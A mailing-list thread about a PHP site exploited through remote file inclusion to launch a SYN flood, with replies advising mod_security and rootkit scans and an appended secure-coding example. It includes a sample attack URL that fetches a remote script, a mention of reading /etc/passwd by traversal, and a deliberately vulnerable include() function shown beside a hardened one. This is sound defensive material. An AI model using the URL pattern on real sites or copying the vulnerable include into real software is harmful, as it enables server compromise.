Yep, a couple of times.
Looks like they have used a phpupload script to plant a file on your
server. All it then takes is a few infected PCs to target that file and
launch the flood.
Or in our case, loads of emails claiming to be from "voxcards.com.br"
We eventually installed mod_security onto our servers in order to
prevent a lot of this rubbish from occurring. (www.gotroot.com) - the
rules it uses are quite good at blocking the phpupload attempts,
although you will get some false positives.
Check your /tmp and /dev/shm for any other hidden surprises. If you have
chkrootkit or rkhunter installed, it might be a good idea to run that too.
Paul W
Diana Saunders wrote:
> I started a thread last week regarding trying to block some IPs that I
> thought were sending a syn flood on my server. The suggested action
> (IP Tables) didn't seem to help.
>
> It turns out the problem was a little different than I expected and I
> wanted to let everyone know exactly what was happening.
>
> What someone was doing was running the following URLs on one of the
> server's sites:
>
> http://www.domainname.com/index.php?active=http://www.someotherdomain.com/filename.gif
>
>
> But filename.gif is not a gif, it is a text file with a script that
> sends a synflood to some other server.
>
> The ?active= part of the URL is the way the site was set up for
> navigation. Although I design in PHP a lot, I haven't run across this
> particular navigation set up. But in any event, it obviously opens
> the site to the kind of exploiting behavior it was getting. I'm
> assuming some design software set the navigation up this way and that
> once this is taken out there shouldn't be a problem.
>
> Has anyone else run across this?
>
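The navigation pattern Diana describes is a remote file inclusion: a request parameter is handed straight to include(), so a URL pointing at an attacker-hosted file (named .gif or otherwise) gets fetched and executed as PHP. The following is an added example, not code from either poster's site, showing that pattern next to an allow-list replacement. The page names, the pages/ directory and the two function names are assumptions made for the illustration.

```php
<?php
// Added example (not from the original mailing-list thread).
// The "active" parameter name comes from the thread; the page names,
// the pages/ directory and the function names are hypothetical.

// VULNERABLE: index.php?active=http://www.someotherdomain.com/filename.gif
// If PHP is allowed to open URLs for include (allow_url_fopen, and on
// PHP >= 5.2 allow_url_include), include() downloads the remote file and
// runs whatever PHP it contains. It can also be pointed at local files
// such as ../../etc/passwd or a previously uploaded file in /tmp.
function render_page_vulnerable(array $get): void
{
    $page = $get['active'] ?? 'home';
    include $page;   // attacker controls the whole include target
}

// HARDENED: the parameter is only ever a key into a fixed table of
// local files. Nothing from the request reaches the filesystem or
// a URL wrapper, so there is nothing to traverse or fetch.
function render_page_safe(array $get): void
{
    $pages = [
        'home'    => __DIR__ . '/pages/home.php',
        'about'   => __DIR__ . '/pages/about.php',
        'contact' => __DIR__ . '/pages/contact.php',
    ];

    $key = $get['active'] ?? 'home';
    if (!is_string($key) || !array_key_exists($key, $pages)) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }

    // Belt and braces: refuse anything outside pages/ even if the table
    // is later edited carelessly (e.g. a symlink placed in pages/).
    $resolved = realpath($pages[$key]);
    if ($resolved === false
        || strpos($resolved, realpath(__DIR__ . '/pages') . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(500);
        echo 'Page not available';
        return;
    }

    include $resolved;
}

render_page_safe($_GET);
```

Alongside the code change, turn the URL wrappers off in php.ini (allow_url_include = Off, and allow_url_fopen = Off if nothing on the host needs it); that stops every remote-include attempt server-wide rather than just on the one script, which is the same idea as the mod_security rules Paul mentions, applied one layer down.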